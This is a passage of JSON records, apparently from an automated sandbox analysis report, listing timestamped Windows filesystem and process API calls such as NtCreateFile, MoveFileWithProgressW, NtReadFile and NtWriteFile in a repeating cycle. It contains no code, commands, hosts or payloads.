"MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,280", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:54,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,310", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:54,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,340", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,360", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:54,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,390", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,400", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,420", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:54,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:54,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,460", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,470", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,490", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,501", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,511", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,521", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,521", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,531", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,551", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:54,551", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,561", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,571", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,581", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:54,581", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:54,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,631", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 